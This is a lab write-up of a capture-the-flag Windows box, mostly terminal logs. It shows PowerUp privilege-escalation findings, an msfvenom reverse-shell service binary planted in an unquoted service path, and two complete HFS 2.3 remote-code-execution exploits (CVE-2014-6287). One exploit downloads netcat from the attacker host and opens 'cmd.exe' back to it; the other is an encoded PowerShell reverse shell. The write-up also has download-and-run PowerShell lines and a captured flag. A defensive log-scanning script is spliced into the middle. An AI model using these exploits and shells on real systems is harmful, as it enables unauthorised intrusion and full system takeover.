AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : AWSLiteAgent
Path : C:\Program Files\Amazon\XenTools\LiteAgent.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AWSLiteAgent' -Path <HijackPath>
CanRestart : False
Name : AWSLiteAgent
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit; IdentityReference=STEELMOUNTAIN\bill;
Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'IObitUnSvr' -Path <HijackPath>
CanRestart : False
Name : IObitUnSvr
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=WriteData/AddFile}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiablePath : @{ModifiablePath=C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe;
IdentityReference=STEELMOUNTAIN\bill; Permissions=System.Object[]}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'LiveUpdateSvc' -Path <HijackPath>
CanRestart : False
Name : LiveUpdateSvc
Check : Unquoted Service Paths
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFile : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'AdvancedSystemCareService9'
CanRestart : True
Name : AdvancedSystemCareService9
Check : Modifiable Service Files
ServiceName : IObitUnSvr
Path : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFile : C:\Program Files (x86)\IObit\IObit Uninstaller\IUService.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'IObitUnSvr'
CanRestart : False
Name : IObitUnSvr
Check : Modifiable Service Files
ServiceName : LiveUpdateSvc
Path : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFile : C:\Program Files (x86)\IObit\LiveUpdate\LiveUpdate.exe
ModifiableFilePermissions : {WriteAttributes, Synchronize, ReadControl, ReadData/ListDirectory...}
ModifiableFileIdentityReference : STEELMOUNTAIN\bill
StartName : LocalSystem
AbuseFunction : Install-ServiceBinary -Name 'LiveUpdateSvc'
CanRestart : False
Name : LiveUpdateSvc
Check : Modifiable Service Files
PS >
IMPORTANT: THIS SERVICE HAS AN UNQUOTED PATH WITH SPACES, RUNS AS LOCALSYSTEM AND CAN BE RESTARTED BY OUR USER, SO WE CAN EXPLOIT IT TO GAIN THE PRIVILEGES OF THE SERVICE ACCOUNT:
ServiceName : AdvancedSystemCareService9
Path : C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
ModifiablePath : @{ModifiablePath=C:\; IdentityReference=BUILTIN\Users; Permissions=AppendData/AddSubdirectory}
StartName : LocalSystem
AbuseFunction : Write-ServiceBinary -Name 'AdvancedSystemCareService9' -Path <HijackPath>
CanRestart : True
Name : AdvancedSystemCareService9
Check : Unquoted Service Paths
WE BUILD AN .EXE WITH MSFVENOM ON THE ATTACKER MACHINE (exe-service FORMAT, SO IT BEHAVES AS A SERVICE BINARY), LISTEN WITH NETCAT, AND UPLOAD IT FROM THE METERPRETER SESSION INTO THE UNQUOTED PATH SO THAT THE SERVICE RUNS IT ON RESTART:
WE GET SYSTEM (PRIVILEGE ESCALATION). ATTACKER SIDE:
┌──(root㉿kali)-[~]
└─# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.53.67 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Final size of exe-service file: 15872 bytes
Saved as: Advanced.exe
┌──(root㉿kali)-[~]
└─# ls
2856 Advanced.exe Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos
49125.py Desktop Downloads Pictures Public Templates user.txt
┌──(root㉿kali)-[~]
└─# nc -lnvp 4443
listening on [any] 4443 ...
ls
connect to [10.10.53.67] from (UNKNOWN) [10.10.220.84] 49371
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.
C:\Windows\system32>whoami
whoami
nt authority\system
FLAG:
C:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 2E4A-906A
Directory of C:\Users\Administrator\Desktop
10/12/2020 11:05 AM <DIR> .
10/12/2020 11:05 AM <DIR> ..
10/12/2020 11:05 AM 1,528 activation.ps1
09/27/2019 04:41 AM 32 root.txt
2 File(s) 1,560 bytes
2 Dir(s) 44,153,380,864 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
9af5f314f57607c00fd09803a587db80
--------
VICTIM:
meterpreter > ls
Listing: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
====================================================================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 0 dir 2024-01-18 23:12:55 +0000 %TEMP%
100666/rw-rw-rw- 174 fil 2019-09-27 11:07:07 +0000 desktop.ini
100777/rwxrwxrwx 760320 fil 2014-02-16 20:58:52 +0000 hfs.exe
meterpreter > pwd
C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
meterpreter > cd C:\Program Files (x86)\IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd Program Files (x86)\IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd /Program Files (x86)/IObit
[-] stdapi_fs_chdir: Operation failed: The system cannot find the file specified.
meterpreter > cd "/Program Files (x86)/IObit"
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2024-01-18 21:08:53 +0000 Advanced SystemCare
040777/rwxrwxrwx 16384 dir 2019-09-27 05:35:24 +0000 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 15:18:50 +0000 LiveUpdate
meterpreter > upload Advanced.exe
[*] uploading : /root/Advanced.exe -> Advanced.exe
[*] Uploaded 15.50 KiB of 15.50 KiB (100.0%): /root/Advanced.exe -> Advanced.exe
[*] uploaded : /root/Advanced.exe -> Advanced.exe
meterpreter > ls
Listing: C:\Program Files (x86)\IObit
=====================================
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
040777/rwxrwxrwx 32768 dir 2024-01-18 21:08:53 +0000 Advanced SystemCare
100777/rwxrwxrwx 15872 fil 2024-01-18 23:16:03 +0000 Advanced.exe
040777/rwxrwxrwx 16384 dir 2019-09-27 05:35:24 +0000 IObit Uninstaller
040777/rwxrwxrwx 4096 dir 2019-09-26 15:18:50 +0000 LiveUpdate
PS > Stop-Service -Name AdvancedSystemCareService9
PS > Start-Service -Name AdvancedSystemCareService9
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
WITHOUT METASPLOIT:
THIS SCRIPT DID NOT WORK*****************
┌──(root㉿kali)-[~]
└─# ls
2856 Advanced.exe Documents Music PowerUp.ps1 QuAYnAaGoYf.exe Videos user.txt
49125.py Desktop Downloads Pictures Public Templates exploitpaimon.py
┌──(root㉿kali)-[~]
└─# cat exploitpaimon.py
#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
# It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux.
#Usage : python Exploit.py <Target IP address> <Target Port Number>
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!
import urllib2
import sys
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")

    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")

    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")

    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address> <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""
////////////////////
I TRY ANOTHER SCRIPT:
THIS SCRIPT DID NOT WORK:*****************
http://10.10.220.84:8080/?search=%00{.+exec|whoami}
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<title>HFS /</title>
<link rel="stylesheet" href="/?mode=section&id=style.css" type="text/css">
<script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.js"></script>
<script> if (typeof jQuery == "undefined") document.write('<script type="text/javascript" src="/?mode=jquery"></'+'script>'); </script>
<link rel="shortcut icon" href="/favicon.ico">
<style class='trash-me'>
.onlyscript, button[onclick] { display:none; }
</style>
<script>
// this object will store some %symbols% in the javascript space, so that libs can read them
HFS = { folder:'/', number:0, paged:1 };
</script>
<script type="text/javascript" src="/?mode=section&id=lib.js"></script>
</head>
<body>
<!-- -->
<div id='panel'>
<fieldset id='msgs'>
<legend><img src="/~img10"> Messages</legend>
<ul style='padding-left:2em'>
</ul>
</fieldset>
<fieldset id='login'>
<legend><img src="/~img27"> User</legend>
<center>
<a href="~login">Login</a>
</center>
</fieldset>
<fieldset id='folder'>
<legend><img src="/~img8"> Folder</legend>
<div style='float:right; position:relative; top:-1em; font-weight:bold;'>
<a href="."><img src="/~img14"> Back</a>
</div>
<div id='breadcrumbs'>
<a href="/" /> <img src="/~img1"> Home</a>
</div>
<div id='folder-stats'>0 folders, 0 files, 0 bytes
</div>
</fieldset>
<fieldset id='search'>
<legend><img src="/~img3"> Search</legend>
<form style='text-align:center'>
<input name='search' size='15' value="{.replace
<fieldset id='select' class='onlyscript'>
<legend><img src="/~img15"> Select</legend>
<center>
<button onclick="
var x = $('#files .selector');
if (x.size() > x.filter(':checked').size())
x.attr('checked', true).closest('tr').addClass('selected');
else
x.attr('checked', false).closest('tr').removeClass('selected');
selectedChanged();
">All</button>
<button onclick="
$('#files .selector').attr('checked', function(i,v){ return !v }).closest('tr').toggleClass('selected');
selectedChanged();
">Invert</button>
<button onclick='selectionMask.call(this)'>Mask</button>
<p style='display:none; margin-top:1em;'><span id='selected-number'>0</span> items selected</p>
</center>
</fieldset>
<fieldset id='actions'>
<legend><img src="/~img18"> Actions</legend>
<center>
<button id='archiveBtn' onclick='if (confirm("Are you sure?")) submit({}, "/?search=%00%7B.+exec%7Cwhoami%7D&mode=archive&recursive")'>Archive</button>
<a href="/?search=%00%7B.+exec%7Cwhoami%7D&tpl=list">Get list</a>
</center>
</fieldset>
<fieldset id='serverinfo'>
<legend><img src="/~img0"> Server information</legend>
<a href="http://www.rejetto.com/hfs/">HttpFileServer 2.3</a>
<br />Server time: 1/18/2024 4:50:25 PM
<br />Server uptime: 03:41:53
</fieldset>
</div>
<div id='files_outer'>
<div style='height:1.6em;'></div>
<div style='font-size:200%; padding:1em;'>No items match your search query</div>
</div>
</body>
</html>
//////////////////////
BINGO, WE GOT IT: WITH THIS EXPLOIT SCRIPT WE HAVE THE REVERSE SHELL:
# Exploit Title: HFS (HTTP File Server) 2.3.x - Remote Command Execution (3)
# Google Dork: intext:"httpfileserver 2.3"
# Date: 20/02/2021
# Exploit Author: Pergyz
# Vendor Homepage: http://www.rejetto.com/hfs/
# Software Link: https://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Microsoft Windows Server 2012 R2 Standard
# CVE : CVE-2014-6287
# Reference: https://www.rejetto.com/wiki/index.php/HFS:_scripting_commands
#!/usr/bin/python3
import base64
import os
import urllib.request
import urllib.parse
lhost = "10.10.10.1"
lport = 1111
rhost = "10.10.10.8"
rport = 80
# Define the command to be written to a file
command = f'$client = New-Object System.Net.Sockets.TCPClient("{lhost}",{lport}); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{{0}}; while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){{; $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (Invoke-Expression $data 2>&1 | Out-String ); $sendback2 = $sendback + "PS " + (Get-Location).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}}; $client.Close()'
# Encode the command in base64 format
encoded_command = base64.b64encode(command.encode("utf-16le")).decode()
print("\nEncoded the command in base64 format...")
# Define the payload to be included in the URL
payload = f'exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand {encoded_command}'
# Encode the payload and send a HTTP GET request
encoded_payload = urllib.parse.quote_plus(payload)
url = f'http://{rhost}:{rport}/?search=%00{{.{encoded_payload}.}}'
urllib.request.urlopen(url)
print("\nEncoded the payload and sent a HTTP GET request to the target...")
# Print some information
print("\nPrinting some information for debugging...")
print("lhost: ", lhost)
print("lport: ", lport)
print("rhost: ", rhost)
print("rport: ", rport)
print("payload: ", payload)
# Listen for connections
print("\nListening for connection...")
os.system(f'nc -nlvp {lport}')
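Both scripts above, and the manual `/?search=%00{.+exec|whoami}` probe, rely on the same CVE-2014-6287 pattern: a NUL byte followed by an HFS scripting macro in the `search` parameter. The detection helper below is an added example (not part of the writeup nor of either exploit) that decodes request targets from web-server log lines, extracts the macro command, and recovers the script hidden behind `powershell -EncodedCommand`. The log lines are constructed in a common access-log layout (HFS's own log format differs), and the encoded payload in the sample carries a harmless command so the decoder can be checked.

```python
"""Detect HFS scripting-macro injection (CVE-2014-6287 pattern) in web logs.

Added example, not from the writeup or from either exploit script. Sample log
lines are constructed in a generic access-log layout; the third one is built
the same way the exploit builds its URL, but with a harmless command.
"""
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, quote_plus, urlsplit

# HFS evaluates text between "{." and ".}" as a scripting macro. The 2.3 filter
# stopped scanning the search string at a NUL byte, so %00 hid the macro.
MACRO_RE = re.compile(r"\{\.\s*(?P<cmd>[A-Za-z_]+)\s*\|(?P<args>[^}]*)\}")
ENCODED_RE = re.compile(r"-(?:EncodedCommand|enc)\s+([A-Za-z0-9+/=]+)", re.I)
HIGH_RISK = {"exec", "save", "load", "delete"}  # process, file write, fetch, unlink
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_encoded_command(args: str) -> Optional[str]:
    """Recover the script behind powershell -EncodedCommand (base64 of UTF-16LE)."""
    m = ENCODED_RE.search(args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def inspect_target(target: str) -> Optional[dict]:
    """Decode every query parameter of a request target and report HFS macros."""
    query = urlsplit(target).query
    for param, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            macros = []
            for m in MACRO_RE.finditer(value):
                args = m.group("args")
                if args.endswith("."):  # the closing ".}" leaves a dot in args
                    args = args[:-1]
                macros.append({"cmd": m.group("cmd").lower(), "args": args,
                               "decoded_command": decode_encoded_command(args)})
            if not macros:
                continue
            return {
                "param": param,
                "nul_prefix": "\x00" in value,  # the filter-bypass marker
                "macros": macros,
                "severity": "high" if any(x["cmd"] in HIGH_RISK for x in macros)
                            else "medium",
            }
    return None


def scan_log(lines) -> list:
    """Run inspect_target over access-log lines; keep only the hits."""
    findings = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue
        hit = inspect_target(m.group("target"))
        if hit:
            hit["line"] = line
            findings.append(hit)
    return findings


# Constructed sample log. The encoded PowerShell mirrors how the exploit above
# builds its payload, but carries a harmless command.
_HARMLESS = "Write-Output hello"
_ENC = base64.b64encode(_HARMLESS.encode("utf-16le")).decode()
_PAYLOAD = quote_plus(f"exec|powershell.exe -NoProfile -EncodedCommand {_ENC}")
SAMPLE_LOG = [
    '10.10.0.5 - - [19/Jan/2024:23:50:01 +0000] "GET /?search=report.pdf HTTP/1.1" 200 -',
    '10.10.0.9 - - [19/Jan/2024:23:50:07 +0000] "GET /?search=%00{.+exec|whoami} HTTP/1.1" 200 -',
    f'10.10.0.9 - - [19/Jan/2024:23:50:12 +0000] "GET /?search=%00{{.{_PAYLOAD}.}} HTTP/1.1" 200 -',
    '10.10.0.5 - - [19/Jan/2024:23:50:20 +0000] "GET /?search=%7Bnotes%7D HTTP/1.1" 200 -',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["severity"], f["param"], f["nul_prefix"], f["macros"])
```

Decoding every parameter before matching matters: the working exploit percent-encodes the pipe and spaces, so a rule that only looks for the literal `{.exec|` in the raw request line would miss it while still catching the hand-typed probe. The NUL-prefix flag and the macro command name give a triage analyst the two facts that distinguish this from a search for a file name that happens to contain braces.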
WE SERVE THE STATIC BINARY FROM A WEB SERVER:
┌──(root㉿kali)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
10.10.53.252 - - [19/Jan/2024 23:54:35] "GET /nc.exe HTTP/1.1" 200 -
^C
Keyboard interrupt received, exiting.
┌──(root㉿kali)-[~]
└─# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
WE RUN IT TO GET THE CONNECTION:
┌──(root㉿kali)-[~]
└─# python3 paimonexploit2.py
Encoded the command in base64 format...
Encoded the payload and sent a HTTP GET request to the target...
Printing some information for debugging...
lhost: 10.10.71.192
lport: 443
rhost: 10.10.53.252
rport: 8080
payload: exec|powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -EncodedCommand <base64 blob omitted>
Listening for connection...
listening on [any] 443 ...
connect to [10.10.71.192] from (UNKNOWN) [10.10.53.252] 49344
dir
Directory: C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 2/16/2014 12:58 PM 760320 hfs.exe
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup> whoami
steelmountain\bill
PS C:\Users\bill\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup>
I TRY TO RUN IT:
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASps1 -OutFile Winpeas.ps1
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASps1 -OutFile winPEASps1
winPEASps1
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASexe -OutFile winPEASexe
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEASexe -OutFile winPEAS.exe
icacls .\winPEAS.exe /grant:r "$($env:USERNAME):(F)"
winPEASexe
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/winPEAS.ps1 -OutFile winPEAS.ps1
winPEAS.ps1
powershell -c (new-object System.Net.WebClient).DownloadFile('http://10.10.71.192:80/winPEASps1','winPEAS.ps1')
powershell -c (New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/PowerUp.ps1 -OutFile PowerUp.ps1
PowerUp.ps1
Which powershell -c command could we run to find the service name manually?
powershell -c Get-Service
powershell -f .\winPEAS.ps1
powershell -c .\Winpeas.ps1
powershell -c .\Winpeas.ps1
powershell -c ./Winpeas.ps1
********** ** *************
powershell -c ServiceName
powershell -c "Get-Service"
powershell -c .\winPEASany
powershell -f .\winPEAS.ps1
powershell -c .\winPEAS.ps1
SERVICE:
AdvancedSystemCareService9
powershell -c Invoke-WebRequest -Uri http://10.10.71.192/Advanced.exe -OutFile Advanced.exe
Advanced.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.71.192 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o Advanced.exe
┌──(root㉿kali)-[~]
└─# nc -lnvp 4443
listening on [any] 4443 ...
connect to [10.10.71.192] from (UNKNOWN) [10.10.53.252] 49436
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd ..
cd ..